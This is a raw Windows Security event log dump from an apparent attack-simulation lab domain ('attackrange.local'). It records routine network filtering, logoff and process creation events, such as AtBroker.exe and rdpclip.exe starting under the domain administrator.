Application Information:
Process ID: 632
Application Name: \device\harddiskvolume1\windows\system32\lsass.exe
Network Information:
Direction: Inbound
Source Address: fe80::118f:34ac:1322:c17e
Source Port: 63912
Destination Address: fe80::118f:34ac:1322:c17e
Destination Port: 49669
Protocol: 6
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887175
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 55376
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887174
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: ::1
Source Port: 49637
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887173
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 49637
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887172
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 49637
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887171
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 49637
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887170
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 50512
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887169
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 50512
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887168
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 169.254.79.158
Source Port: 50512
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 69910
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887167
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: fe80::d02d:b038:b054:4f9e
Source Port: 50512
Destination Address: ff02::1:3
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 69912
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887166
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 50512
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887165
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 50512
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887164
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 58196
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887163
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 58196
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887162
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 169.254.79.158
Source Port: 58196
Destination Address: 224.0.0.252
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 69910
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887161
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: fe80::d02d:b038:b054:4f9e
Source Port: 58196
Destination Address: ff02::1:3
Destination Port: 5355
Protocol: 17
Filter Information:
Filter Run-Time ID: 69912
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887160
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58196
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887159
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58196
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887158
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 137
Destination Address: 169.254.255.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887157
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 137
Destination Address: 169.254.255.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887156
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Outbound
Source Address: 169.254.79.158
Source Port: 137
Destination Address: 169.254.255.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 69910
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887155
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 53913
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887154
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: ::1
Source Port: 58083
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887153
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 58083
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887152
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58083
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887151
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 58083
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278815
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 10.0.1.15
Source Port: 138
Destination Address: 10.0.1.255
Destination Port: 138
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278814
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 138
Destination Address: 10.0.1.255
Destination Port: 138
Protocol: 17
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=278813
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 3840
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.15
Source Port: 53910
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 67344
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887150
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x1B9F2C
Process Information:
Process ID: 0x1868
Process Name: C:\Windows\System32\AtBroker.exe
Exit Status: 0x1
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887149
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1648
Process Name: C:\Windows\System32\winlogon.exe
Exit Status: 0x0
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887148
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0x8D33D1
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887147
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0x8D340A
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887146
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0x8D340A
Process Information:
Process ID: 0x1bb4
Process Name: C:\Windows\System32\dwm.exe
Exit Status: 0xD00002FE
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887145
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x1B9F2C
Process Information:
New Process ID: 0x1868
New Process Name: C:\Windows\System32\AtBroker.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0xba4
Creator Process Name: C:\Windows\System32\winlogon.exe
Process Command Line: atbroker.exe
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887144
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x13fc
Process Name: C:\Windows\System32\LogonUI.exe
Exit Status: 0x0
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887143
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1264
Destination Address: 40.70.224.147
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887142
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1264
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887141
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 54637
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887140
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: ::1
Source Port: 52857
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887139
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 52857
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887138
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 52857
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887137
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 52857
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887136
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x1B9F2C
Process Information:
Process ID: 0x12e0
Process Name: C:\Windows\System32\rdpclip.exe
Exit Status: 0x0
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=887135
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x8DB827
Logon Type: 10
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887134
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\NETWORK SERVICE
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E4
Target Subject:
Security ID: ATTACKRANGE\Administrator
Account Name: administrator
Account Domain: ATTACKRANGE
Logon ID: 0x1B9F2C
Process Information:
New Process ID: 0x12e0
New Process Name: C:\Windows\System32\rdpclip.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\High Mandatory Level
Creator Process ID: 0x130
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: rdpclip
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887133
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x924
New Process Name: C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x34c
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.4349_none_7f09d74e21ec00ab\TiWorker.exe -Embedding
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:43 PM
